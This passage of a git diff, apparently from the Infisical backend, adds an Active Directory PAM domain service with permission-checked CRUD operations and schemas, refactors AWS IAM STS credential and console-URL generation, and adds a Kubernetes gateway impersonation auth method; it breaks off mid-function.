+import { z } from "zod"; + +import { PamDomainsSchema, ResourceMetadataSchema } from "@app/db/schemas"; +import { slugSchema } from "@app/server/lib/schemas"; +import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; + +import { ActiveDirectoryConnectionDetailsSchema } from "./active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "./pam-domain-enums"; + +export const BasePamDomainSchema = PamDomainsSchema.omit({ + encryptedConnectionDetails: true, + domainType: true +}).extend({ + metadata: ResourceMetadataSchema.pick({ id: true, key: true, value: true }).array().optional() +}); + +export const ActiveDirectoryDomainListItemSchema = z.object({ + name: z.literal("Active Directory"), + domain: z.literal(PamDomainType.ActiveDirectory) +}); + +const BaseActiveDirectoryDomainSchema = BasePamDomainSchema.extend({ + domainType: z.literal(PamDomainType.ActiveDirectory) +}); + +export const ActiveDirectoryDomainSchema = BaseActiveDirectoryDomainSchema.extend({ + connectionDetails: ActiveDirectoryConnectionDetailsSchema +}); + +export const SanitizedActiveDirectoryDomainSchema = BaseActiveDirectoryDomainSchema.extend({ + connectionDetails: ActiveDirectoryConnectionDetailsSchema +}); + +const CoreCreatePamDomainSchema = z.object({ + projectId: z.string().uuid(), + name: slugSchema({ field: "name" }), + metadata: ResourceMetadataNonEncryptionSchema.optional() +}); + +export const CreateActiveDirectoryDomainSchema = CoreCreatePamDomainSchema.extend({ + gatewayId: z.string().uuid(), + connectionDetails: ActiveDirectoryConnectionDetailsSchema +}); + +const CoreUpdatePamDomainSchema = z.object({ + name: slugSchema({ field: "name" }).optional(), + metadata: ResourceMetadataNonEncryptionSchema.optional() +}); + +export const UpdateActiveDirectoryDomainSchema = CoreUpdatePamDomainSchema.extend({ + gatewayId: z.string().uuid().optional(), + connectionDetails: 
ActiveDirectoryConnectionDetailsSchema.optional() +}); + +export const SanitizedDomainSchema = z.discriminatedUnion("domainType", [SanitizedActiveDirectoryDomainSchema]); diff --git a/backend/src/ee/services/pam-domain/pam-domain-service.ts b/backend/src/ee/services/pam-domain/pam-domain-service.ts new file mode 100644 index 00000000000..bdeeda3a192 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-service.ts @@ -0,0 +1,419 @@ +import { ForbiddenError, subject } from "@casl/ability"; + +import { ActionProjectType, TPamDomains } from "@app/db/schemas"; +import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; +import { DatabaseErrorCode } from "@app/lib/error-codes"; +import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; +import { OrgServiceActor } from "@app/lib/types"; + +import { decryptAccountCredentials } from "../pam-account/pam-account-fns"; +import { decryptResourceConnectionDetails } from "../pam-resource/pam-resource-fns"; +import { TWindowsResource } from "../pam-resource/windows-server/windows-server-resource-types"; +import { PamDomainType } from "./pam-domain-enums"; +import { PAM_DOMAIN_FACTORY_MAP } from "./pam-domain-factory"; +import { decryptDomainConnectionDetails, encryptDomainConnectionDetails } from "./pam-domain-fns"; +import { + TCreateDomainDTO, + TListDomainsDTO, + TPamDomain, + TPamDomainServiceFactoryDep, + TUpdateDomainDTO +} from "./pam-domain-types"; + +export type TPamDomainServiceFactory = ReturnType; + +const decryptDomain = async ( + domain: TPamDomains, + projectId: string, + kmsService: TPamDomainServiceFactoryDep["kmsService"] +): Promise => { + const connectionDetails = await decryptDomainConnectionDetails({ + encryptedConnectionDetails: domain.encryptedConnectionDetails, + projectId, + kmsService + }); + + return { + ...domain, + domainType: domain.domainType as PamDomainType, + connectionDetails + } as TPamDomain; +}; + +export 
const pamDomainServiceFactory = ({ + pamDomainDAL, + pamResourceDAL, + permissionService, + kmsService, + gatewayV2Service, + resourceMetadataDAL +}: TPamDomainServiceFactoryDep) => { + const getById = async (id: string, domainType: PamDomainType, actor: OrgServiceActor) => { + const domain = await pamDomainDAL.findById(id); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${id}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds([domain.id]); + const domainMetadata = metadataByDomainId[domain.id] || []; + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Read, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: domainMetadata + }) + ); + + if (domain.domainType !== domainType) { + throw new BadRequestError({ + message: `Domain with ID '${id}' is not of type '${domainType}'` + }); + } + + return { + ...(await decryptDomain(domain, domain.projectId, kmsService)), + metadata: domainMetadata + }; + }; + + const create = async ( + { domainType, connectionDetails, gatewayId, name, projectId, metadata }: TCreateDomainDTO, + actor: OrgServiceActor + ) => { + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId, + actionProjectType: ActionProjectType.PAM + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Create, + subject(ProjectPermissionSub.PamDomains, { + name, + domainType, + metadata: (metadata || []).map(({ key, value }) => ({ key, value: value ?? 
"" })) + }) + ); + + const existingDomain = await pamDomainDAL.findOne({ name, projectId }); + if (existingDomain) { + throw new BadRequestError({ + message: `Domain with name '${name}' already exists in this project` + }); + } + + const factory = PAM_DOMAIN_FACTORY_MAP[domainType]( + domainType, + connectionDetails, + gatewayId, + gatewayV2Service, + projectId + ); + + const validatedConnectionDetails = await factory.validateConnection(); + const encryptedConnectionDetails = await encryptDomainConnectionDetails({ + connectionDetails: validatedConnectionDetails, + projectId, + kmsService + }); + + try { + const { domain: newDomain, insertedMetadata } = await pamDomainDAL.transaction(async (tx) => { + const created = await pamDomainDAL.create( + { + domainType, + encryptedConnectionDetails, + gatewayId, + name, + projectId + }, + tx + ); + let metadataRows: Awaited> | undefined; + if (metadata && metadata.length > 0) { + metadataRows = await resourceMetadataDAL.insertMany( + metadata.map(({ key, value }) => ({ + key, + value: value ?? "", + pamDomainId: created.id, + orgId: actor.orgId + })), + tx + ); + } + return { domain: created, insertedMetadata: metadataRows }; + }); + + return { + ...(await decryptDomain(newDomain, projectId, kmsService)), + metadata: insertedMetadata?.map(({ id, key, value }) => ({ id, key, value: value ?? "" })) ?? 
[] + }; + } catch (err) { + if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { + throw new BadRequestError({ + message: `Domain with name '${name}' already exists in this project` + }); + } + throw err; + } + }; + + const updateById = async ( + { domainId, connectionDetails, name, gatewayId, metadata }: TUpdateDomainDTO, + actor: OrgServiceActor + ) => { + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const existingMetadata = await pamDomainDAL.findMetadataByDomainIds([domainId]); + const currentMetadata = existingMetadata[domainId] || []; + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Edit, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: currentMetadata + }) + ); + + if (metadata || name) { + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Edit, + subject(ProjectPermissionSub.PamDomains, { + name: name ?? domain.name, + domainType: domain.domainType, + metadata: metadata ? metadata.map(({ key, value }) => ({ key, value: value ?? "" })) : currentMetadata + }) + ); + } + + const updateDoc: Partial = {}; + const effectiveGatewayId = gatewayId !== undefined ? 
gatewayId : domain.gatewayId; + + if (gatewayId !== undefined) { + updateDoc.gatewayId = gatewayId; + } + + if (name !== undefined) { + updateDoc.name = name; + } + + if (connectionDetails !== undefined) { + const factory = PAM_DOMAIN_FACTORY_MAP[domain.domainType as PamDomainType]( + domain.domainType as PamDomainType, + connectionDetails, + effectiveGatewayId, + gatewayV2Service, + domain.projectId + ); + const validatedConnectionDetails = await factory.validateConnection(); + const encryptedConnectionDetails = await encryptDomainConnectionDetails({ + connectionDetails: validatedConnectionDetails, + projectId: domain.projectId, + kmsService + }); + updateDoc.encryptedConnectionDetails = encryptedConnectionDetails; + } + + if (Object.keys(updateDoc).length === 0 && metadata === undefined) { + const existingMeta = await pamDomainDAL.findMetadataByDomainIds([domainId]); + return { + ...(await decryptDomain(domain, domain.projectId, kmsService)), + metadata: existingMeta[domainId] || [] + }; + } + + try { + const updatedDomain = await pamDomainDAL.transaction(async (tx) => { + if (metadata) { + await resourceMetadataDAL.delete({ pamDomainId: domainId }, tx); + if (metadata.length > 0) { + await resourceMetadataDAL.insertMany( + metadata.map(({ key, value }) => ({ + key, + value: value ?? 
"", + pamDomainId: domainId, + orgId: actor.orgId + })), + tx + ); + } + } + if (Object.keys(updateDoc).length > 0) { + return pamDomainDAL.updateById(domainId, updateDoc, tx); + } + return domain; + }); + + const freshMeta = await pamDomainDAL.findMetadataByDomainIds([domainId]); + + return { + ...(await decryptDomain(updatedDomain, domain.projectId, kmsService)), + metadata: freshMeta[domainId] || [] + }; + } catch (err) { + if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { + throw new BadRequestError({ + message: `Domain with name '${name}' already exists in this project` + }); + } + throw err; + } + }; + + const deleteById = async (id: string, actor: OrgServiceActor) => { + const domain = await pamDomainDAL.findById(id); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${id}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds([id]); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Delete, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: metadataByDomainId[id] || [] + }) + ); + + try { + const deletedDomain = await pamDomainDAL.deleteById(id); + return await decryptDomain(deletedDomain, domain.projectId, kmsService); + } catch (err) { + if ( + err instanceof DatabaseError && + (err.error as { code: string })?.code === DatabaseErrorCode.ForeignKeyViolation + ) { + throw new BadRequestError({ + message: "Failed to delete domain because it is attached to active PAM accounts or resources" + }); + } + throw err; + } + }; + + const list = async ({ projectId, actor, actorId, actorAuthMethod, actorOrgId, 
...params }: TListDomainsDTO) => { + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + actorAuthMethod, + actorOrgId, + projectId, + actionProjectType: ActionProjectType.PAM + }); + + ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.PamDomains); + + const { domains, totalCount } = await pamDomainDAL.findByProjectId({ + projectId, + ...params + }); + + const domainIds = domains.map((d) => d.id); + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds(domainIds); + + return { + domains: await Promise.all( + domains.map(async (d) => ({ + ...(await decryptDomain(d, projectId, kmsService)), + metadata: metadataByDomainId[d.id] || [] + })) + ), + totalCount + }; + }; + + const listRelatedResources = async (domainId: string, actor: OrgServiceActor) => { + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds([domainId]); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Read, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: metadataByDomainId[domainId] || [] + }) + ); + + const relatedResources = await pamResourceDAL.find({ domainId }); + + return Promise.all( + relatedResources.map(async (r) => { + const { encryptedConnectionDetails, encryptedRotationAccountCredentials, encryptedResourceMetadata, ...rest } = + r; + const rConnectionDetails = await decryptResourceConnectionDetails({ + encryptedConnectionDetails, + projectId: domain.projectId, + kmsService 
+ }); + const rotationAccountCredentials = encryptedRotationAccountCredentials + ? await decryptAccountCredentials({ + encryptedCredentials: encryptedRotationAccountCredentials, + projectId: domain.projectId, + kmsService + }) + : null; + return { ...rest, connectionDetails: rConnectionDetails, rotationAccountCredentials } as TWindowsResource; + }) + ); + }; + + const listDomainOptions = () => { + return [{ name: "Active Directory" as const, domain: PamDomainType.ActiveDirectory }].sort((a, b) => + a.name.localeCompare(b.name) + ); + }; + + return { + getById, + create, + updateById, + deleteById, + list, + listRelatedResources, + listDomainOptions + }; +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-types.ts b/backend/src/ee/services/pam-domain/pam-domain-types.ts new file mode 100644 index 00000000000..827467d9c21 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-types.ts @@ -0,0 +1,89 @@ +import { z } from "zod"; + +import { OrderByDirection, TProjectPermission } from "@app/lib/types"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TResourceMetadataDALFactory } from "@app/services/resource-metadata/resource-metadata-dal"; +import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; + +import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; +import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; +import { TPostRotateContext } from "../pam-resource/pam-resource-types"; +import { TPermissionServiceFactory } from "../permission/permission-service-types"; +import { TActiveDirectoryConnectionDetails } from "./active-directory/active-directory-domain-types"; +import { TPamDomainDALFactory } from "./pam-domain-dal"; +import { PamDomainOrderBy, PamDomainType } from "./pam-domain-enums"; + +export type TPamDomainConnectionDetails = TActiveDirectoryConnectionDetails; + +export type TPamDomain = { + id: string; + 
projectId: string; + name: string; + domainType: PamDomainType; + gatewayId?: string | null; + discoveryFingerprint?: string | null; + createdAt: Date; + updatedAt: Date; + connectionDetails: TPamDomainConnectionDetails; + metadata?: Array<{ id: string; key: string; value: string }>; +}; + +export type TCreateDomainDTO = { + projectId: string; + name: string; + domainType: PamDomainType; + gatewayId?: string | null; + connectionDetails: TPamDomainConnectionDetails; + metadata?: z.input; +}; + +export type TUpdateDomainDTO = { + domainId: string; + name?: string; + gatewayId?: string | null; + connectionDetails?: TPamDomainConnectionDetails; + metadata?: z.input; +}; + +export type TListDomainsDTO = { + search?: string; + orderBy?: PamDomainOrderBy; + orderDirection?: OrderByDirection; + limit?: number; + offset?: number; + discoveryFingerprint?: string; + filterDomainTypes?: string[]; +} & TProjectPermission; + +export type TDeleteDomainDTO = { + domainId: string; +}; + +export type TPamDomainServiceFactoryDep = { + pamDomainDAL: TPamDomainDALFactory; + pamResourceDAL: Pick; + permissionService: Pick; + kmsService: Pick; + gatewayV2Service: Pick; + resourceMetadataDAL: Pick; +}; + +export type TPamDomainFactory = ( + domainType: PamDomainType, + connectionDetails: T, + gatewayId: string | null | undefined, + gatewayV2Service: Pick, + projectId: string | null | undefined +) => { + validateConnection: () => Promise; + validateAccountCredentials: (credentials: C) => Promise; + rotateAccountCredentials: (rotationAccountCredentials: C, currentCredentials: C) => Promise; + postRotate?: ( + accountId: string, + newCredentials: C, + projectId: string, + ctx: TPostRotateContext, + rotationAccountCredentials: C + ) => Promise; + handleOverwritePreventionForCensoredValues: (updatedAccountCredentials: C, currentCredentials: C) => Promise; +}; diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-fns.ts 
b/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-fns.ts deleted file mode 100644 index 5b4ad8a2991..00000000000 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-fns.ts +++ /dev/null @@ -1,8 +0,0 @@ -import { ActiveDirectoryResourceListItemSchema } from "./active-directory-resource-schemas"; - -export const getActiveDirectoryResourceListItem = () => { - return { - name: ActiveDirectoryResourceListItemSchema.shape.name.value, - resource: ActiveDirectoryResourceListItemSchema.shape.resource.value - }; -}; diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-schemas.ts b/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-schemas.ts deleted file mode 100644 index de81a0e798f..00000000000 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-schemas.ts +++ /dev/null @@ -1,113 +0,0 @@ -import { z } from "zod"; - -import { PamResource } from "../pam-resource-enums"; -import { - BaseCreateGatewayPamResourceSchema, - BaseCreatePamAccountSchema, - BasePamAccountSchema, - BasePamAccountSchemaWithResource, - BasePamResourceSchema, - BaseUpdateGatewayPamResourceSchema, - BaseUpdatePamAccountSchema -} from "../pam-resource-schemas"; -import { ActiveDirectoryAccountType } from "./active-directory-resource-enums"; - -// Resources -const BaseActiveDirectoryResourceSchema = BasePamResourceSchema.extend({ - resourceType: z.literal(PamResource.ActiveDirectory) -}); - -export const ActiveDirectoryResourceListItemSchema = z.object({ - name: z.literal("Active Directory"), - resource: z.literal(PamResource.ActiveDirectory) -}); - -export const ActiveDirectoryResourceConnectionDetailsSchema = z.object({ - domain: z.string().trim().min(1).max(255), - dcAddress: z.string().trim().min(1).max(255), - port: z.coerce.number().int().min(1).max(65535), - useLdaps: z.boolean(), - ldapRejectUnauthorized: z.boolean(), - ldapCaCert: z 
- .string() - .trim() - .transform((val) => val || undefined) - .optional(), - ldapTlsServerName: z - .string() - .trim() - .transform((val) => val || undefined) - .optional() -}); - -// Credentials (username + password for AD) -export const ActiveDirectoryAccountCredentialsSchema = z.object({ - username: z.string().trim().min(1).max(255), - password: z.string().trim().min(1).max(255) -}); - -// Account metadata -export const ActiveDirectoryAccountMetadataSchema = z.object({ - accountType: z.nativeEnum(ActiveDirectoryAccountType), - adGuid: z.string().optional(), - displayName: z.string().optional(), - userPrincipalName: z.string().optional(), - servicePrincipalName: z.string().array().optional(), - userAccountControl: z.number().optional(), - passwordLastSet: z.string().optional(), - lastLogon: z.string().optional() -}); - -export const ActiveDirectoryResourceSchema = BaseActiveDirectoryResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema, - rotationAccountCredentials: ActiveDirectoryAccountCredentialsSchema.nullable().optional() -}); - -export const SanitizedActiveDirectoryResourceSchema = BaseActiveDirectoryResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema, - rotationAccountCredentials: z - .object({ - username: z.string() - }) - .nullable() - .optional() -}); - -export const CreateActiveDirectoryResourceSchema = BaseCreateGatewayPamResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema, - rotationAccountCredentials: ActiveDirectoryAccountCredentialsSchema.nullable().optional() -}); - -export const UpdateActiveDirectoryResourceSchema = BaseUpdateGatewayPamResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema.optional(), - rotationAccountCredentials: ActiveDirectoryAccountCredentialsSchema.nullable().optional() -}); - -// Accounts -export const ActiveDirectoryAccountSchema = BasePamAccountSchema.extend({ - 
credentials: ActiveDirectoryAccountCredentialsSchema, - internalMetadata: ActiveDirectoryAccountMetadataSchema -}); - -export const CreateActiveDirectoryAccountSchema = BaseCreatePamAccountSchema.extend({ - credentials: ActiveDirectoryAccountCredentialsSchema, - internalMetadata: ActiveDirectoryAccountMetadataSchema -}); - -export const UpdateActiveDirectoryAccountSchema = BaseUpdatePamAccountSchema.extend({ - credentials: ActiveDirectoryAccountCredentialsSchema.optional(), - internalMetadata: ActiveDirectoryAccountMetadataSchema.optional() -}); - -export const SanitizedActiveDirectoryAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.ActiveDirectory), - credentials: z.object({ - username: z.string() - }), - internalMetadata: ActiveDirectoryAccountMetadataSchema -}); - -// Sessions -export const ActiveDirectorySessionCredentialsSchema = ActiveDirectoryResourceConnectionDetailsSchema.and( - ActiveDirectoryAccountCredentialsSchema -); diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-types.ts b/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-types.ts deleted file mode 100644 index df6e1033d2a..00000000000 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-types.ts +++ /dev/null @@ -1,18 +0,0 @@ -import { z } from "zod"; - -import { - ActiveDirectoryAccountCredentialsSchema, - ActiveDirectoryAccountMetadataSchema, - ActiveDirectoryAccountSchema, - ActiveDirectoryResourceConnectionDetailsSchema, - ActiveDirectoryResourceSchema -} from "./active-directory-resource-schemas"; - -// Resources -export type TActiveDirectoryResource = z.infer; -export type TActiveDirectoryResourceConnectionDetails = z.infer; - -// Accounts -export type TActiveDirectoryAccount = z.infer; -export type TActiveDirectoryAccountCredentials = z.infer; -export type TActiveDirectoryAccountInternalMetadata = z.infer; diff --git 
a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts index 97415a0888f..20b7e52fe4c 100644 --- a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts +++ b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts @@ -181,10 +181,19 @@ export const validateTargetRoleAssumption = async ({ } }; +export type TAwsIamSessionCredentials = { + accessKeyId: string; + secretAccessKey: string; + sessionToken: string; + expiresAt: Date; +}; + /** - * Assumes the target role and generates a federated console sign-in URL. + * Runs the STS role-chaining sequence and returns the temporary credentials + * that the caller can either consume directly (CLI) or exchange for a + * federated console sign-in URL via {@link exchangeCredentialsForConsoleUrl}. */ -export const generateConsoleFederationUrl = async ({ +export const generateAwsIamSessionCredentials = async ({ connectionDetails, targetRoleArn, roleSessionName, @@ -196,7 +205,7 @@ export const generateConsoleFederationUrl = async ({ roleSessionName: string; projectId: string; sessionDuration: number; -}): Promise<{ consoleUrl: string; expiresAt: Date }> => { +}): Promise => { const pamCredentials = await assumePamRole({ connectionDetails, projectId, @@ -216,15 +225,31 @@ export const generateConsoleFederationUrl = async ({ const { AccessKeyId, SecretAccessKey, SessionToken, Expiration } = targetCredentials!; - // Generate federation URL + if (!AccessKeyId || !SecretAccessKey || !SessionToken) { + throw new InternalServerError({ + message: "AWS STS returned credentials missing required fields" + }); + } + + return { + accessKeyId: AccessKeyId, + secretAccessKey: SecretAccessKey, + sessionToken: SessionToken, + expiresAt: Expiration ?? 
new Date(Date.now() + sessionDuration * 1000) + }; +}; + +// Exchanges existing STS credentials for a one-shot AWS console sign-in URL +export const exchangeCredentialsForConsoleUrl = async ( + credentials: Pick +): Promise => { const sessionJson = JSON.stringify({ - sessionId: AccessKeyId, - sessionKey: SecretAccessKey, - sessionToken: SessionToken + sessionId: credentials.accessKeyId, + sessionKey: credentials.secretAccessKey, + sessionToken: credentials.sessionToken }); const federationEndpoint = "https://signin.aws.amazon.com/federation"; - const signinTokenUrl = `${federationEndpoint}?Action=getSigninToken&Session=${encodeURIComponent(sessionJson)}`; const tokenResponse = await request.get<{ SigninToken?: string }>(signinTokenUrl); @@ -236,10 +261,5 @@ export const generateConsoleFederationUrl = async ({ } const consoleDestination = `https://console.aws.amazon.com/`; - const consoleUrl = `${federationEndpoint}?Action=login&SigninToken=${encodeURIComponent(tokenResponse.data.SigninToken)}&Destination=${encodeURIComponent(consoleDestination)}`; - - return { - consoleUrl, - expiresAt: Expiration ?? 
new Date(Date.now() + sessionDuration * 1000) - }; + return `${federationEndpoint}?Action=login&SigninToken=${encodeURIComponent(tokenResponse.data.SigninToken)}&Destination=${encodeURIComponent(consoleDestination)}`; }; diff --git a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts index cc79f17d8c2..8b6f8cfc666 100644 --- a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts @@ -72,7 +72,7 @@ export const UpdateAwsIamAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedAwsIamAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.AwsIam), + parentType: z.literal(PamResource.AwsIam), credentials: AwsIamAccountCredentialsSchema.pick({ targetRoleArn: true, defaultSessionDuration: true diff --git a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts index 21d7da806ce..a846debbe4a 100644 --- a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts +++ b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts @@ -1,3 +1,4 @@ export enum KubernetesAuthMethod { - ServiceAccountToken = "service-account-token" + ServiceAccountToken = "service-account-token", + GatewayKubernetesAuth = "gateway-kubernetes-auth" } diff --git a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts index d2c50dfc3ae..d58e6e19f08 100644 --- a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts +++ b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts @@ -1,8 +1,9 @@ -import axios, { AxiosError } from "axios"; +import { 
AxiosError } from "axios"; import https from "https"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; -import { GatewayProxyProtocol } from "@app/lib/gateway/types"; +import { GatewayHttpProxyActions, GatewayProxyProtocol } from "@app/lib/gateway/types"; import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; @@ -71,6 +72,38 @@ export const executeWithGateway = async ( ); }; +const validateWithGatewayHttp = async ( + config: { + gatewayId: string; + }, + gatewayV2Service: Pick, + operation: (baseUrl: string) => Promise +): Promise => { + // For gateway-auth validation, the gateway auto-discovers the K8s API from env vars, + // so we use a placeholder host/port. The actual target is resolved by the gateway's + // use-k8s-sa handler via KUBERNETES_SERVICE_HOST env var. + const platformConnectionDetails = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId: config.gatewayId, + targetHost: "kubernetes.default.svc.cluster.local", + targetPort: 443 + }); + if (!platformConnectionDetails) { + throw new BadRequestError({ message: "Unable to connect to gateway, no platform connection details found" }); + } + return withGatewayV2Proxy( + async (proxyPort) => { + const baseUrl = `http://localhost:${proxyPort}`; + return operation(baseUrl); + }, + { + protocol: GatewayProxyProtocol.Http, + relayHost: platformConnectionDetails.relayHost, + gateway: platformConnectionDetails.gateway, + relay: platformConnectionDetails.relay + } + ); +}; + export const kubernetesResourceFactory: TPamResourceFactory< TKubernetesResourceConnectionDetails, TKubernetesAccountCredentials, @@ -87,7 +120,7 @@ export const kubernetesResourceFactory: TPamResourceFactory< async (baseUrl, httpsAgent) => { // Validate connection by checking API server version try { - await axios.get(`${baseUrl}/version`, { + await request.get(`${baseUrl}/version`, { ...(httpsAgent ? 
{ httpsAgent } : {}), signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), timeout: EXTERNAL_REQUEST_TIMEOUT @@ -127,17 +160,19 @@ export const kubernetesResourceFactory: TPamResourceFactory< if (!gatewayId) { throw new BadRequestError({ message: "Gateway ID is required" }); } - try { - await executeWithGateway( - { connectionDetails, gatewayId, resourceType }, - gatewayV2Service, - async (baseUrl, httpsAgent) => { - const { authMethod } = credentials; - if (authMethod === KubernetesAuthMethod.ServiceAccountToken) { + + const { authMethod } = credentials; + + if (authMethod === KubernetesAuthMethod.ServiceAccountToken) { + try { + await executeWithGateway( + { connectionDetails, gatewayId, resourceType }, + gatewayV2Service, + async (baseUrl, httpsAgent) => { // Validate service account token using SelfSubjectReview API (whoami) // This endpoint doesn't require any special permissions from the service account try { - await axios.post( + await request.post( `${baseUrl}/apis/authentication.k8s.io/v1/selfsubjectreviews`, { apiVersion: "authentication.k8s.io/v1", @@ -169,22 +204,97 @@ export const kubernetesResourceFactory: TPamResourceFactory< } throw error; } - } else { - throw new BadRequestError({ - message: `Unsupported Kubernetes auth method: ${authMethod as string}` - }); } + ); + return credentials; + } catch (error) { + if (error instanceof BadRequestError) { + throw error; } - ); - return credentials; - } catch (error) { - if (error instanceof BadRequestError) { - throw error; + throw new BadRequestError({ + message: `Unable to validate account credentials for ${resourceType}: ${(error as Error).message || String(error)}` + }); } - throw new BadRequestError({ - message: `Unable to validate account credentials for ${resourceType}: ${(error as Error).message || String(error)}` - }); } + + if (authMethod === KubernetesAuthMethod.GatewayKubernetesAuth) { + // Validate gateway auth by performing an impersonated SelfSubjectReview through the gateway. 
+ // The gateway's use-k8s-sa handler injects its own pod token and discovers the K8s API. + // We add Impersonate-User header which passes through untouched. + // This validates that the gateway has RBAC permission to impersonate the specified SA. + // NOTE: It does NOT verify the SA exists β€” K8s impersonation is a pure permission check. + // A non-existent SA passes validation here but fails at session time with 403. + try { + await validateWithGatewayHttp({ gatewayId }, gatewayV2Service, async (baseUrl) => { + const impersonateUser = `system:serviceaccount:${credentials.namespace}:${credentials.serviceAccountName}`; + try { + await request.post( + `${baseUrl}/apis/authentication.k8s.io/v1/selfsubjectreviews`, + { + apiVersion: "authentication.k8s.io/v1", + kind: "SelfSubjectReview" + }, + { + headers: { + "Content-Type": "application/json", + "x-infisical-action": GatewayHttpProxyActions.UseGatewayK8sServiceAccount, + "Impersonate-User": impersonateUser + }, + signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), + timeout: EXTERNAL_REQUEST_TIMEOUT + } + ); + + logger.info( + `[Kubernetes Resource Factory] Gateway K8s auth validation successful 